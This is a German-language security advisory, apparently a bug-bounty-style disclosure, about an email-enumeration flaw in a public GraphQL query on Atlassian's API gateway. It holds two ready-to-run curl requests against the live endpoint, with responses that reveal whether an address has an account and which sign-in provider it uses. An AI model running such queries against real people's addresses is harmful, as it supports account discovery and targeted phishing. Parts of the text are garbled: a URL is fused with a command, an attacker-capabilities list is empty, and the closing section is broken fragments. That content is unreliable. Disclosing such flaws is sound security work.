
CVE-2026-XXXX: Atlassian GraphQL E-Mail Enumeration Oracle (CWE-204, CVSS 5.3 MEDIUM)
Atlassian Central GraphQL Gateway (api.atlassian.com/graphql)
CWE-204: Erkennbare Antwortunterschiede — E-Mail-Enumeration-Orakel
MITTEL — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Die GraphQL-Abfrage loomUnauthenticated_primaryAuthTypeForEmail auf dem zentralen GraphQL-Gateway von Atlassian gibt je nachdem, ob eine E-Mail-Adresse bei Atlassian registriert ist, unterschiedliche Antworten zurück, was eine nicht authentifizierte Benutzer-Enumeration ermöglicht.
Registrierte E-Mail → gibt authType (z. B. workos, password, google) und eine Weiterleitungs-URI zurück
Nicht registrierte E-Mail → gibt authType: "none" ohne Weiterleitungs-URI zurück
Es ist keine Authentifizierung erforderlich. Der Abfragename enthält „Unauthenticated" – sie ist absichtlich öffentlich, sollte aber nicht preisgeben, ob eine beliebige E-Mail ein Atlassian-Konto hat.
https://api.atlassian.com/graphqlcurl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'
Antwort:
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "workos",
"hasActiveMemberships": false,
"redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
}
}
}
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'
Antwort:
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "none"
}
}
}
authType: "workos" bestätigt, dass die E-Mail WorkOS SSO verwendet. authType: "google" oder authType: "password" würden die Authentifizierungsmethode preisgeben. Dies ermöglicht gezieltes Phishing.
Ein nicht authentifizierter Angreifer kann:
Die Abfrage loomUnauthenticated_primaryAuthTypeForEmail führt keine Ratenbegrenzung durch und gibt für jede E-Mail ohne Authentifizierung Informationen zum Authentifizierungsanbieter zurück. Obwohl der Endpunkt absichtlich nicht authentifiziert ist (für den Anmeldevorgang von Loom), gibt er preis, ob eine E-Mail ein Konto hat und welchen Authentifizierungsanbieter sie verwendet.
Nach gründlichen Tests wurden diese Behauptungen widerlegt:
aaid: "unidentified")ValidationError fehl)unidentified)Wh4l3X